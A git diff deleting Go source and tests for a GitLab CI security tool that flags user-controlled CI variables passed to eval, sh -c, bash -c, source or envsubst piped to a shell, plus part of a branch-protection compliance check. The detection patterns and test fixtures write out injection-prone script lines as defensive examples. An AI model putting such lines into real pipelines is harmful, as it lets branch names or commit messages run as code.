- JobsChecked uint `json:"jobsChecked"`
- TotalScriptLinesChecked uint `json:"totalScriptLinesChecked"`
- UnsafeExpansionsFound uint `json:"unsafeExpansionsFound"`
-}
-
-// GitlabPipelineVariableInjectionResult holds the result of the control
-type GitlabPipelineVariableInjectionResult struct {
- Issues []GitlabPipelineVariableInjectionIssue `json:"issues"`
- Metrics GitlabPipelineVariableInjectionMetrics `json:"metrics"`
- Compliance float64 `json:"compliance"`
- Version string `json:"version"`
- CiValid bool `json:"ciValid"`
- CiMissing bool `json:"ciMissing"`
- Skipped bool `json:"skipped"`
- Error string `json:"error,omitempty"`
-}
-
-////////////////////
-// Control issues //
-////////////////////
-
-// GitlabPipelineVariableInjectionIssue represents a dangerous variable found in a code-execution context
-type GitlabPipelineVariableInjectionIssue struct {
- Code ErrorCode `json:"code"`
- DocURL string `json:"docUrl"`
- JobName string `json:"jobName"`
- VariableName string `json:"variableName"`
- ScriptLine string `json:"scriptLine"`
- ScriptBlock string `json:"scriptBlock"` // "script", "before_script", "after_script"
-}
-
-///////////////////////
-// Control functions //
-///////////////////////
-
-// Patterns that introduce a shell re-interpretation context.
-// A variable expanded by the outer shell and passed to one of these
-// is re-parsed as code, enabling command injection.
-var shellReparsePatterns = []*regexp.Regexp{
- regexp.MustCompile(`\beval\b`),
- regexp.MustCompile(`\bsh\s+-c\b`),
- regexp.MustCompile(`\bbash\s+-c\b`),
- regexp.MustCompile(`\bdash\s+-c\b`),
- regexp.MustCompile(`\bzsh\s+-c\b`),
- regexp.MustCompile(`\bksh\s+-c\b`),
- regexp.MustCompile(`\benvsubst\b.*\|\s*(sh|bash|dash|zsh)`),
- regexp.MustCompile(`\bxargs\s+(sh|bash)\b`),
- regexp.MustCompile(`\bsource\b`),
- regexp.MustCompile(`^\s*\.(\s|$)`),
-}
-
-// isShellReparseContext returns true if the line contains a command that
-// re-interprets its arguments as shell code (eval, sh -c, bash -c, etc.).
-func isShellReparseContext(line string) bool {
- for _, re := range shellReparsePatterns {
- if re.MatchString(line) {
- return true
- }
- }
- return false
-}
-
-// Run executes the unsafe variable expansion detection control.
-//
-// GitLab CI sets CI variables as environment variables; the shell does
-// NOT re-parse expanded values for command substitution. So plain usage
-// like `echo $CI_COMMIT_BRANCH` is safe: the shell treats the expanded
-// value as an inert string.
-//
-// The real injection surface is commands that RE-INTERPRET their input
-// as shell code: eval, sh -c, bash -c, source, etc. A user-controlled
-// variable passed to these is executed as code.
-func (p *GitlabPipelineVariableInjectionConf) Run(pipelineOriginData *collector.GitlabPipelineOriginData) *GitlabPipelineVariableInjectionResult {
- l := l.WithFields(logrus.Fields{
- "control": "GitlabPipelineVariableInjection",
- "controlVersion": ControlTypeGitlabPipelineVariableInjectionVersion,
- })
- l.Info("Start unsafe variable expansion detection control")
-
- result := &GitlabPipelineVariableInjectionResult{
- Issues: []GitlabPipelineVariableInjectionIssue{},
- Metrics: GitlabPipelineVariableInjectionMetrics{},
- Compliance: 100.0,
- Version: ControlTypeGitlabPipelineVariableInjectionVersion,
- CiValid: pipelineOriginData.CiValid,
- CiMissing: pipelineOriginData.CiMissing,
- Skipped: false,
- }
-
- if !p.Enabled {
- l.Info("Unsafe variable expansion detection control is disabled, skipping")
- result.Skipped = true
- return result
- }
-
- if len(p.DangerousVariables) == 0 {
- l.Info("No dangerous variables configured, skipping")
- result.Skipped = true
- return result
- }
-
- mergedConf := pipelineOriginData.MergedConf
- if mergedConf == nil {
- l.Warn("Merged CI configuration not available, cannot check scripts")
- result.Compliance = 0
- result.Error = "merged CI configuration not available"
- return result
- }
-
- // Build regexes for each dangerous variable.
- // Match $VAR or ${VAR} ensuring the unbraced form has a word boundary.
- varRegexes := make(map[string]*regexp.Regexp, len(p.DangerousVariables))
- for _, v := range p.DangerousVariables {
- pattern := fmt.Sprintf(`\$(?:\{%s\}|%s(?:[^a-zA-Z0-9_]|$))`, regexp.QuoteMeta(v), regexp.QuoteMeta(v))
- varRegexes[v] = regexp.MustCompile(pattern)
- }
-
- // Compile allowed patterns
- var allowedRegexes []*regexp.Regexp
- for _, pat := range p.AllowedPatterns {
- re, err := regexp.Compile(pat)
- if err != nil {
- l.WithError(err).WithField("pattern", pat).Warn("Invalid allowed pattern, ignoring")
- continue
- }
- allowedRegexes = append(allowedRegexes, re)
- }
-
- // Check global before_script and after_script
- p.scanScriptBlock(mergedConf.BeforeScript, "(global)", "before_script", varRegexes, allowedRegexes, result)
- p.scanScriptBlock(mergedConf.AfterScript, "(global)", "after_script", varRegexes, allowedRegexes, result)
-
- // Check per-job scripts
- for jobName, jobContent := range mergedConf.GitlabJobs {
- job, err := gitlab.ParseGitlabCIJob(jobContent)
- if err != nil {
- l.WithError(err).WithField("job", jobName).Debug("Unable to parse job, skipping")
- continue
- }
- if job == nil {
- continue
- }
-
- result.Metrics.JobsChecked++
-
- p.scanScriptBlock(job.Script, jobName, "script", varRegexes, allowedRegexes, result)
- p.scanScriptBlock(job.BeforeScript, jobName, "before_script", varRegexes, allowedRegexes, result)
- p.scanScriptBlock(job.AfterScript, jobName, "after_script", varRegexes, allowedRegexes, result)
- }
-
- if len(result.Issues) > 0 {
- result.Compliance = 0.0
- l.WithField("issuesCount", len(result.Issues)).Info("Unsafe variable expansions found, setting compliance to 0")
- }
-
- l.WithFields(logrus.Fields{
- "jobsChecked": result.Metrics.JobsChecked,
- "totalScriptLines": result.Metrics.TotalScriptLinesChecked,
- "unsafeExpansionsFound": result.Metrics.UnsafeExpansionsFound,
- "compliance": result.Compliance,
- }).Info("Unsafe variable expansion detection control completed")
-
- return result
-}
-
-// scanScriptBlock scans a script block for dangerous variables used in
-// shell re-interpretation contexts (eval, sh -c, bash -c, etc.).
-func (p *GitlabPipelineVariableInjectionConf) scanScriptBlock(
- scriptField interface{},
- jobName string,
- blockType string,
- varRegexes map[string]*regexp.Regexp,
- allowedRegexes []*regexp.Regexp,
- result *GitlabPipelineVariableInjectionResult,
-) {
- lines := gitlab.GetScriptLines(scriptField)
- for _, line := range lines {
- result.Metrics.TotalScriptLinesChecked++
-
- trimmed := strings.TrimSpace(line)
- if trimmed == "" || strings.HasPrefix(trimmed, "#") {
- continue
- }
-
- if !isShellReparseContext(trimmed) {
- continue
- }
-
- if isAllowedLine(trimmed, allowedRegexes) {
- continue
- }
-
- for varName, re := range varRegexes {
- if re.MatchString(line) {
- result.Issues = append(result.Issues, GitlabPipelineVariableInjectionIssue{
- Code: CodeUnsafeVariableExpansion,
- DocURL: CodeUnsafeVariableExpansion.DocURL(),
- JobName: jobName,
- VariableName: varName,
- ScriptLine: truncateLine(trimmed, 200),
- ScriptBlock: blockType,
- })
- result.Metrics.UnsafeExpansionsFound++
- }
- }
- }
-}
-
-// isAllowedLine returns true if the line matches any of the allowed patterns
-func isAllowedLine(line string, allowedRegexes []*regexp.Regexp) bool {
- for _, re := range allowedRegexes {
- if re.MatchString(line) {
- return true
- }
- }
- return false
-}
-
-// truncateLine shortens a script line for display, appending "..." if truncated
-func truncateLine(line string, maxLen int) string {
- if len(line) <= maxLen {
- return line
- }
- return line[:maxLen] + "..."
-}
diff --git a/control/controlGitlabPipelineVariableInjection_test.go b/control/controlGitlabPipelineVariableInjection_test.go
deleted file mode 100644
index 2b2ea61..0000000
--- a/control/controlGitlabPipelineVariableInjection_test.go
+++ /dev/null
@@ -1,518 +0,0 @@
-package control
-
-import (
- "testing"
-
- "github.com/getplumber/plumber/collector"
- "github.com/getplumber/plumber/gitlab"
-)
-
-func buildPipelineOriginDataWithJobs(jobs map[string]interface{}) *collector.GitlabPipelineOriginData {
- mergedConf := &gitlab.GitlabCIConf{
- GitlabJobs: jobs,
- }
- return &collector.GitlabPipelineOriginData{
- MergedConf: mergedConf,
- CiValid: true,
- CiMissing: false,
- }
-}
-
-func TestVariableInjection_Disabled(t *testing.T) {
- conf := &GitlabPipelineVariableInjectionConf{
- Enabled: false,
- DangerousVariables: []string{"CI_COMMIT_MESSAGE"},
- }
- data := buildPipelineOriginDataWithJobs(nil)
-
- result := conf.Run(data)
-
- if !result.Skipped {
- t.Fatal("expected control to be skipped when disabled")
- }
- if result.Compliance != 100.0 {
- t.Fatalf("expected compliance 100 when skipped, got %v", result.Compliance)
- }
-}
-
-func TestVariableInjection_NoDangerousVariablesConfigured(t *testing.T) {
- conf := &GitlabPipelineVariableInjectionConf{
- Enabled: true,
- DangerousVariables: []string{},
- }
- data := buildPipelineOriginDataWithJobs(nil)
-
- result := conf.Run(data)
-
- if !result.Skipped {
- t.Fatal("expected control to be skipped when no dangerous variables configured")
- }
-}
-
-func TestVariableInjection_NilMergedConf(t *testing.T) {
- conf := &GitlabPipelineVariableInjectionConf{
- Enabled: true,
- DangerousVariables: []string{"CI_COMMIT_MESSAGE"},
- }
- data := &collector.GitlabPipelineOriginData{
- MergedConf: nil,
- CiValid: true,
- CiMissing: false,
- }
-
- result := conf.Run(data)
-
- if result.Compliance != 0 {
- t.Fatalf("expected compliance 0 when merged conf unavailable, got %v", result.Compliance)
- }
- if result.Error == "" {
- t.Fatal("expected error message when merged conf unavailable")
- }
-}
-
-// -- Safe patterns: shell does NOT re-parse expanded env vars --
-
-func TestVariableInjection_EchoIsSafe(t *testing.T) {
- conf := &GitlabPipelineVariableInjectionConf{
- Enabled: true,
- DangerousVariables: []string{"CI_COMMIT_MESSAGE"},
- }
-
- tests := []struct {
- name string
- script string
- }{
- {"unquoted", "echo $CI_COMMIT_MESSAGE"},
- {"double quoted", `echo "$CI_COMMIT_MESSAGE"`},
- {"braced", "echo ${CI_COMMIT_MESSAGE}"},
- {"braced quoted", `echo "${CI_COMMIT_MESSAGE}"`},
- {"printf", `printf '%s\n' "$CI_COMMIT_MESSAGE"`},
- {"curl data", `curl -d "$CI_COMMIT_MESSAGE" https://example.com`},
- {"git checkout", "git checkout $CI_COMMIT_MESSAGE"},
- }
-
- for _, tt := range tests {
- t.Run(tt.name, func(t *testing.T) {
- jobContent := map[interface{}]interface{}{
- "script": []interface{}{tt.script},
- }
- data := buildPipelineOriginDataWithJobs(map[string]interface{}{"build": jobContent})
- result := conf.Run(data)
- if len(result.Issues) != 0 {
- t.Fatalf("script %q should be safe, but got %d issues", tt.script, len(result.Issues))
- }
- if result.Compliance != 100.0 {
- t.Fatalf("expected compliance 100, got %v", result.Compliance)
- }
- })
- }
-}
-
-// -- Dangerous patterns: commands that re-interpret args as shell code --
-
-func TestVariableInjection_EvalIsDangerous(t *testing.T) {
- conf := &GitlabPipelineVariableInjectionConf{
- Enabled: true,
- DangerousVariables: []string{"CI_MERGE_REQUEST_TITLE"},
- }
-
- tests := []struct {
- name string
- script string
- }{
- {"eval bare", "eval $CI_MERGE_REQUEST_TITLE"},
- {"eval quoted", `eval "echo $CI_MERGE_REQUEST_TITLE"`},
- {"eval braced", `eval "${CI_MERGE_REQUEST_TITLE}"`},
- {"eval braced no quotes", `eval ${CI_MERGE_REQUEST_TITLE}`},
- {"eval in middle", `RESULT=$(eval "echo $CI_MERGE_REQUEST_TITLE")`},
- }
-
- for _, tt := range tests {
- t.Run(tt.name, func(t *testing.T) {
- jobContent := map[interface{}]interface{}{
- "script": []interface{}{tt.script},
- }
- data := buildPipelineOriginDataWithJobs(map[string]interface{}{"build": jobContent})
- result := conf.Run(data)
- if len(result.Issues) != 1 {
- t.Fatalf("script %q should be dangerous, expected 1 issue, got %d", tt.script, len(result.Issues))
- }
- })
- }
-}
-
-func TestVariableInjection_ShCIsDangerous(t *testing.T) {
- conf := &GitlabPipelineVariableInjectionConf{
- Enabled: true,
- DangerousVariables: []string{"CI_COMMIT_BRANCH"},
- }
-
- tests := []struct {
- name string
- script string
- }{
- // sh -c variants
- {"sh -c quoted", `sh -c "echo $CI_COMMIT_BRANCH"`},
- {"sh -c unquoted", `sh -c $CI_COMMIT_BRANCH`},
- {"sh -c braced", `sh -c ${CI_COMMIT_BRANCH}`},
- {"sh -c braced quoted", `sh -c "${CI_COMMIT_BRANCH}"`},
- // bash -c variants
- {"bash -c quoted", `bash -c "deploy $CI_COMMIT_BRANCH"`},
- {"bash -c unquoted", `bash -c $CI_COMMIT_BRANCH`},
- {"bash -c braced quoted", `bash -c "${CI_COMMIT_BRANCH}"`},
- // dash -c variants
- {"dash -c quoted", `dash -c "$CI_COMMIT_BRANCH"`},
- {"dash -c braced", `dash -c ${CI_COMMIT_BRANCH}`},
- // zsh -c variants
- {"zsh -c quoted", `zsh -c "$CI_COMMIT_BRANCH"`},
- {"zsh -c unquoted", `zsh -c $CI_COMMIT_BRANCH`},
- {"zsh -c braced quoted", `zsh -c "${CI_COMMIT_BRANCH}"`},
- // ksh -c variants
- {"ksh -c unquoted", `ksh -c $CI_COMMIT_BRANCH`},
- {"ksh -c quoted", `ksh -c "$CI_COMMIT_BRANCH"`},
- }
-
- for _, tt := range tests {
- t.Run(tt.name, func(t *testing.T) {
- jobContent := map[interface{}]interface{}{
- "script": []interface{}{tt.script},
- }
- data := buildPipelineOriginDataWithJobs(map[string]interface{}{"deploy": jobContent})
- result := conf.Run(data)
- if len(result.Issues) != 1 {
- t.Fatalf("script %q should be dangerous, expected 1 issue, got %d", tt.script, len(result.Issues))
- }
- })
- }
-}
-
-func TestVariableInjection_XargsShIsDangerous(t *testing.T) {
- conf := &GitlabPipelineVariableInjectionConf{
- Enabled: true,
- DangerousVariables: []string{"CI_COMMIT_BRANCH"},
- }
-
- tests := []struct {
- name string
- script string
- }{
- {"xargs sh", `echo "$CI_COMMIT_BRANCH" | xargs sh`},
- {"xargs bash", `echo "$CI_COMMIT_BRANCH" | xargs bash`},
- }
-
- for _, tt := range tests {
- t.Run(tt.name, func(t *testing.T) {
- jobContent := map[interface{}]interface{}{
- "script": []interface{}{tt.script},
- }
- data := buildPipelineOriginDataWithJobs(map[string]interface{}{"build": jobContent})
- result := conf.Run(data)
- if len(result.Issues) != 1 {
- t.Fatalf("script %q should be dangerous, expected 1 issue, got %d", tt.script, len(result.Issues))
- }
- })
- }
-}
-
-func TestVariableInjection_ShellWithoutCFlagIsSafe(t *testing.T) {
- conf := &GitlabPipelineVariableInjectionConf{
- Enabled: true,
- DangerousVariables: []string{"CI_COMMIT_BRANCH"},
- }
-
- tests := []struct {
- name string
- script string
- }{
- {"bash filename", `bash "$CI_COMMIT_BRANCH"`},
- {"bash filename braced", `bash ${CI_COMMIT_BRANCH}`},
- {"dash filename", `dash $CI_COMMIT_BRANCH`},
- {"zsh filename", `zsh "$CI_COMMIT_BRANCH"`},
- {"ksh filename", `ksh $CI_COMMIT_BRANCH`},
- {"envsubst no pipe", `envsubst "$CI_COMMIT_BRANCH"`},
- }
-
- for _, tt := range tests {
- t.Run(tt.name, func(t *testing.T) {
- jobContent := map[interface{}]interface{}{
- "script": []interface{}{tt.script},
- }
- data := buildPipelineOriginDataWithJobs(map[string]interface{}{"build": jobContent})
- result := conf.Run(data)
- if len(result.Issues) != 0 {
- t.Fatalf("script %q should be safe (no -c flag), but got %d issues", tt.script, len(result.Issues))
- }
- })
- }
-}
-
-func TestVariableInjection_SourceIsDangerous(t *testing.T) {
- conf := &GitlabPipelineVariableInjectionConf{
- Enabled: true,
- DangerousVariables: []string{"CI_COMMIT_REF_NAME"},
- }
-
- jobContent := map[interface{}]interface{}{
- "script": []interface{}{
- `source <(echo "$CI_COMMIT_REF_NAME")`,
- },
- }
- data := buildPipelineOriginDataWithJobs(map[string]interface{}{"build": jobContent})
- result := conf.Run(data)
-
- if len(result.Issues) != 1 {
- t.Fatalf("source with dangerous var should flag, got %d issues", len(result.Issues))
- }
-}
-
-func TestVariableInjection_EnvsubstPipeIsDangerous(t *testing.T) {
- conf := &GitlabPipelineVariableInjectionConf{
- Enabled: true,
- DangerousVariables: []string{"CI_COMMIT_MESSAGE"},
- }
-
- jobContent := map[interface{}]interface{}{
- "script": []interface{}{
- `envsubst '$CI_COMMIT_MESSAGE' < template.sh | sh`,
- },
- }
- data := buildPipelineOriginDataWithJobs(map[string]interface{}{"build": jobContent})
- result := conf.Run(data)
-
- if len(result.Issues) != 1 {
- t.Fatalf("envsubst | sh with dangerous var should flag, got %d issues", len(result.Issues))
- }
-}
-
-// -- Aliasing through variables: block does NOT help for eval/sh -c --
-
-func TestVariableInjection_AliasedVarInEvalStillDangerous(t *testing.T) {
- conf := &GitlabPipelineVariableInjectionConf{
- Enabled: true,
- DangerousVariables: []string{"CI_COMMIT_BRANCH"},
- }
-
- jobContent := map[interface{}]interface{}{
- "variables": map[interface{}]interface{}{
- "BRANCH": "$CI_COMMIT_BRANCH",
- },
- "script": []interface{}{
- `eval "deploy $CI_COMMIT_BRANCH"`,
- },
- }
- data := buildPipelineOriginDataWithJobs(map[string]interface{}{"deploy": jobContent})
- result := conf.Run(data)
-
- if len(result.Issues) != 1 {
- t.Fatalf("eval with dangerous var should flag even when aliased, got %d issues", len(result.Issues))
- }
-}
-
-// -- Edge cases --
-
-func TestVariableInjection_SkipsComments(t *testing.T) {
- conf := &GitlabPipelineVariableInjectionConf{
- Enabled: true,
- DangerousVariables: []string{"CI_COMMIT_MESSAGE"},
- }
-
- jobContent := map[interface{}]interface{}{
- "script": []interface{}{
- "# eval $CI_COMMIT_MESSAGE",
- " # sh -c $CI_COMMIT_MESSAGE",
- },
- }
- data := buildPipelineOriginDataWithJobs(map[string]interface{}{"build": jobContent})
- result := conf.Run(data)
-
- if len(result.Issues) != 0 {
- t.Fatalf("comment lines should be skipped, got %d issues", len(result.Issues))
- }
-}
-
-func TestVariableInjection_DoesNotMatchLongerVariable(t *testing.T) {
- conf := &GitlabPipelineVariableInjectionConf{
- Enabled: true,
- DangerousVariables: []string{"CI_COMMIT_BRANCH"},
- }
-
- jobContent := map[interface{}]interface{}{
- "script": []interface{}{
- "eval $CI_COMMIT_BRANCH_NAME_EXTRA",
- },
- }
- data := buildPipelineOriginDataWithJobs(map[string]interface{}{"build": jobContent})
- result := conf.Run(data)
-
- if len(result.Issues) != 0 {
- t.Fatalf("longer variable name should not match, got %d issues", len(result.Issues))
- }
-}
-
-func TestVariableInjection_MultipleVarsMultipleJobs(t *testing.T) {
- conf := &GitlabPipelineVariableInjectionConf{
- Enabled: true,
- DangerousVariables: []string{"CI_COMMIT_MESSAGE", "CI_COMMIT_REF_NAME"},
- }
-
- job1 := map[interface{}]interface{}{
- "script": []interface{}{
- `eval "echo $CI_COMMIT_MESSAGE"`,
- },
- }
- job2 := map[interface{}]interface{}{
- "script": []interface{}{
- `bash -c "deploy $CI_COMMIT_REF_NAME"`,
- },
- }
- data := buildPipelineOriginDataWithJobs(map[string]interface{}{
- "build": job1,
- "deploy": job2,
- })
- result := conf.Run(data)
-
- if len(result.Issues) != 2 {
- t.Fatalf("expected 2 issues, got %d", len(result.Issues))
- }
- if result.Compliance != 0.0 {
- t.Fatalf("expected compliance 0, got %v", result.Compliance)
- }
-}
-
-func TestVariableInjection_DetectsInBeforeScript(t *testing.T) {
- conf := &GitlabPipelineVariableInjectionConf{
- Enabled: true,
- DangerousVariables: []string{"CI_COMMIT_REF_NAME"},
- }
-
- jobContent := map[interface{}]interface{}{
- "script": "echo hello",
- "before_script": []interface{}{`sh -c "setup $CI_COMMIT_REF_NAME"`},
- }
- data := buildPipelineOriginDataWithJobs(map[string]interface{}{"deploy": jobContent})
- result := conf.Run(data)
-
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue, got %d", len(result.Issues))
- }
- if result.Issues[0].ScriptBlock != "before_script" {
- t.Fatalf("expected scriptBlock 'before_script', got %s", result.Issues[0].ScriptBlock)
- }
-}
-
-func TestVariableInjection_DetectsInAfterScript(t *testing.T) {
- conf := &GitlabPipelineVariableInjectionConf{
- Enabled: true,
- DangerousVariables: []string{"CI_COMMIT_TITLE"},
- }
-
- jobContent := map[interface{}]interface{}{
- "script": "echo hello",
- "after_script": []interface{}{`eval "notify $CI_COMMIT_TITLE"`},
- }
- data := buildPipelineOriginDataWithJobs(map[string]interface{}{"notify": jobContent})
- result := conf.Run(data)
-
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue, got %d", len(result.Issues))
- }
- if result.Issues[0].ScriptBlock != "after_script" {
- t.Fatalf("expected scriptBlock 'after_script', got %s", result.Issues[0].ScriptBlock)
- }
-}
-
-func TestVariableInjection_GlobalBeforeScript(t *testing.T) {
- conf := &GitlabPipelineVariableInjectionConf{
- Enabled: true,
- DangerousVariables: []string{"CI_COMMIT_BRANCH"},
- }
-
- mergedConf := &gitlab.GitlabCIConf{
- BeforeScript: []interface{}{
- `eval "setup $CI_COMMIT_BRANCH"`,
- },
- GitlabJobs: map[string]interface{}{},
- }
- data := &collector.GitlabPipelineOriginData{
- MergedConf: mergedConf,
- CiValid: true,
- CiMissing: false,
- }
- result := conf.Run(data)
-
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue from global before_script, got %d", len(result.Issues))
- }
- if result.Issues[0].JobName != "(global)" {
- t.Fatalf("expected job '(global)', got %s", result.Issues[0].JobName)
- }
-}
-
-func TestVariableInjection_AllowedPattern(t *testing.T) {
- conf := &GitlabPipelineVariableInjectionConf{
- Enabled: true,
- DangerousVariables: []string{"CI_COMMIT_REF_NAME"},
- AllowedPatterns: []string{`deploy\.sh`},
- }
-
- jobContent := map[interface{}]interface{}{
- "script": []interface{}{
- `sh -c "deploy.sh $CI_COMMIT_REF_NAME"`,
- `sh -c "echo $CI_COMMIT_REF_NAME"`,
- },
- }
- data := buildPipelineOriginDataWithJobs(map[string]interface{}{"build": jobContent})
- result := conf.Run(data)
-
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue (second line only), got %d", len(result.Issues))
- }
-}
-
-func TestVariableInjection_CleanConfig(t *testing.T) {
- conf := &GitlabPipelineVariableInjectionConf{
- Enabled: true,
- DangerousVariables: []string{"CI_COMMIT_MESSAGE", "CI_MERGE_REQUEST_TITLE"},
- }
-
- jobContent := map[interface{}]interface{}{
- "script": []interface{}{
- "echo $CI_COMMIT_MESSAGE",
- "make build",
- `printf '%s' "$CI_MERGE_REQUEST_TITLE"`,
- },
- }
- data := buildPipelineOriginDataWithJobs(map[string]interface{}{"build": jobContent})
- result := conf.Run(data)
-
- if result.Compliance != 100.0 {
- t.Fatalf("expected compliance 100, got %v", result.Compliance)
- }
- if len(result.Issues) != 0 {
- t.Fatalf("expected no issues for safe usage, got %d", len(result.Issues))
- }
-}
-
-func TestVariableInjection_MixedSafeAndDangerous(t *testing.T) {
- conf := &GitlabPipelineVariableInjectionConf{
- Enabled: true,
- DangerousVariables: []string{"CI_COMMIT_BRANCH"},
- }
-
- jobContent := map[interface{}]interface{}{
- "script": []interface{}{
- "echo $CI_COMMIT_BRANCH",
- `git checkout "$CI_COMMIT_BRANCH"`,
- `eval "deploy $CI_COMMIT_BRANCH"`,
- },
- }
- data := buildPipelineOriginDataWithJobs(map[string]interface{}{"build": jobContent})
- result := conf.Run(data)
-
- if len(result.Issues) != 1 {
- t.Fatalf("expected 1 issue (only the eval line), got %d", len(result.Issues))
- }
- if result.Issues[0].ScriptLine != `eval "deploy $CI_COMMIT_BRANCH"` {
- t.Fatalf("expected eval line flagged, got %s", result.Issues[0].ScriptLine)
- }
-}
diff --git a/control/controlGitlabProtectionBranchProtectionNotCompliant.go b/control/controlGitlabProtectionBranchProtectionNotCompliant.go
deleted file mode 100644
index 9fb6464..0000000
--- a/control/controlGitlabProtectionBranchProtectionNotCompliant.go
+++ /dev/null
@@ -1,428 +0,0 @@
-package control
-
-import (
- wildcard "github.com/IGLOU-EU/go-wildcard/v2"
- "github.com/getplumber/plumber/collector"
- "github.com/getplumber/plumber/configuration"
- "github.com/getplumber/plumber/gitlab"
- "github.com/sirupsen/logrus"
-)
-
-const ControlTypeGitlabProtectionBranchProtectionNotCompliantVersion = "0.2.0"
-
-//////////////////////////
-// Control configuration //
-//////////////////////////
-
-// GitlabBranchProtectionControl handles branch protection compliance checking
-type GitlabBranchProtectionControl struct {
- config *configuration.BranchProtectionControlConfig
-}
-
-// NewGitlabBranchProtectionControl creates a new branch protection control instance
-func NewGitlabBranchProtectionControl(config *configuration.BranchProtectionControlConfig) *GitlabBranchProtectionControl {
- return &GitlabBranchProtectionControl{
- config: config,
- }
-}
-
-// BranchProtectionCompliance holds information about a branch's protection compliance
-type BranchProtectionCompliance struct {
- BranchName string
- Default bool
- Protected bool
- AllowForcePush bool
- CodeOwnerApprovalRequired bool
- MinPushAccessLevel int
- MinMergeAccessLevel int
- ProtectionPattern string
- PushAccessLevels []gitlab.BranchProtectionAccessLevel
- MergeAccessLevels []gitlab.BranchProtectionAccessLevel
-}
-
-// GitlabBranchProtectionResult holds the result of the branch protection control
-type GitlabBranchProtectionResult struct {
- Enabled bool `json:"enabled"`
- Skipped bool `json:"skipped,omitempty"`
- Compliance float64 `json:"compliance"`
- Version string `json:"version"`
- Data []BranchProtectionData `json:"data,omitempty"`
- Metrics *BranchProtectionMetrics `json:"metrics,omitempty"`
- Issues []BranchProtectionIssue `json:"issues,omitempty"`
- Error string `json:"error,omitempty"`
-}
-
-// BranchProtectionData holds information about a branch's protection status
-type BranchProtectionData struct {
- BranchName string `json:"branchName"`
- Default bool `json:"default"`
- Protected bool `json:"protected"`
- AllowForcePush bool `json:"allowForcePush,omitempty"`
- CodeOwnerApprovalRequired bool `json:"codeOwnerApprovalRequired,omitempty"`
- MinMergeAccessLevel int `json:"minMergeAccessLevel,omitempty"`
- MinPushAccessLevel int `json:"minPushAccessLevel,omitempty"`
- AuthorizedMinMergeAccessLevel int `json:"authorizedMinMergeAccessLevel,omitempty"`
- AuthorizedMinPushAccessLevel int `json:"authorizedMinPushAccessLevel,omitempty"`
-}
-
-// BranchProtectionMetrics holds metrics for the branch protection control
-type BranchProtectionMetrics struct {
- Branches int `json:"branches"`
- BranchesToProtect int `json:"branchesToProtect"`
- UnprotectedBranches int `json:"unprotectedBranches"`
- NonCompliantBranches int `json:"nonCompliantBranches"`
- TotalProtectedBranches int `json:"totalProtectedBranches"`
- ProjectsCorrectlyProtected int `json:"projectsCorrectlyProtected"`
-}
-
-// BranchProtectionIssue represents an issue found by the branch protection control
-type BranchProtectionIssue struct {
- Code ErrorCode `json:"code"`
- DocURL string `json:"docUrl"`
- Type string `json:"type"` // "unprotected" or "non_compliant"
- BranchName string `json:"branchName"`
- AllowForcePush bool `json:"allowForcePush,omitempty"`
- AllowForcePushDisplay bool `json:"allowForcePushDisplay,omitempty"`
- CodeOwnerApprovalRequired bool `json:"codeOwnerApprovalRequired,omitempty"`
- CodeOwnerApprovalRequiredDisplay bool `json:"codeOwnerApprovalRequiredDisplay,omitempty"`
- MinMergeAccessLevel int `json:"minMergeAccessLevel,omitempty"`
- MinMergeAccessLevelDisplay bool `json:"minMergeAccessLevelDisplay,omitempty"`
- AuthorizedMinMergeAccessLevel int `json:"authorizedMinMergeAccessLevel,omitempty"`
- MinPushAccessLevel int `json:"minPushAccessLevel,omitempty"`
- MinPushAccessLevelDisplay bool `json:"minPushAccessLevelDisplay,omitempty"`
- AuthorizedMinPushAccessLevel int `json:"authorizedMinPushAccessLevel,omitempty"`
-}
-
-///////////////////
-// Control run //
-///////////////////
-
-// Run executes the branch protection compliance check
-func (c *GitlabBranchProtectionControl) Run(
- protectionData *collector.GitlabProtectionAnalysisData,
- project *gitlab.ProjectInfo,
-) *GitlabBranchProtectionResult {
-
- // Set logging
- logger := l.WithFields(logrus.Fields{
- "control": "GitlabBranchProtectionNotCompliant",
- "project": project.Path,
- "projectId": project.ID,
- })
-
- // Check if control is enabled
- if c.config == nil || !c.config.IsEnabled() {
- logger.Info("Branch protection control is disabled or not configured")
- return &GitlabBranchProtectionResult{
- Enabled: false,
- Skipped: true,
- Compliance: 100.0,
- Version: ControlTypeGitlabProtectionBranchProtectionNotCompliantVersion,
- }
- }
-
- // Log the control start
- logger.Info("Start branch protection control")
-
- data := []BranchProtectionData{}
- issues := []BranchProtectionIssue{}
- metrics := &BranchProtectionMetrics{}
- compliance := 0.0
-
- // Check which branches should be protected based on configuration
- branchesToProtect := map[string]*BranchProtectionCompliance{}
- if len(protectionData.Branches) != 0 {
- branchesToProtect = c.checkBranches(
- protectionData.Branches,
- protectionData.BranchProtections,
- project.DefaultBranch,
- )
- }
-
- nonCompliantCount := 0
- unprotectedCount := 0
- totalProtectedBranches := 0
-
- // Get config values with defaults
- allowForcePush := false
- if c.config.AllowForcePush != nil {
- allowForcePush = *c.config.AllowForcePush
- }
-
- codeOwnerApprovalRequired := false
- if c.config.CodeOwnerApprovalRequired != nil {
- codeOwnerApprovalRequired = *c.config.CodeOwnerApprovalRequired
- }
-
- minMergeAccessLevel := 0
- if c.config.MinMergeAccessLevel != nil {
- minMergeAccessLevel = *c.config.MinMergeAccessLevel
- }
-
- minPushAccessLevel := 0
- if c.config.MinPushAccessLevel != nil {
- minPushAccessLevel = *c.config.MinPushAccessLevel
- }
-
- defaultMustBeProtected := false
- if c.config.DefaultMustBeProtected != nil {
- defaultMustBeProtected = *c.config.DefaultMustBeProtected
- }
-
- // Process each branch that should be protected
- for _, branch := range branchesToProtect {
- // Add branch data for all branches that should be protected
- branchData := BranchProtectionData{
- BranchName: branch.BranchName,
- Default: branch.Default,
- Protected: branch.Protected,
- }
-
- // Handle unprotected branches
- if !branch.Protected {
- unprotectedCount++
-
- // Create issue for unprotected branch
- issue := BranchProtectionIssue{
- Code: CodeBranchUnprotected,
- DocURL: CodeBranchUnprotected.DocURL(),
- Type: "unprotected",
- BranchName: branch.BranchName,
- }
- issues = append(issues, issue)
- data = append(data, branchData)
- continue
- }
-
- totalProtectedBranches++
-
- // Skip if this branch doesn't match any pattern in this configuration
- matchesPattern := false
- for _, pattern := range c.config.NamePatterns {
- if wildcard.Match(pattern, branch.BranchName) {
- matchesPattern = true
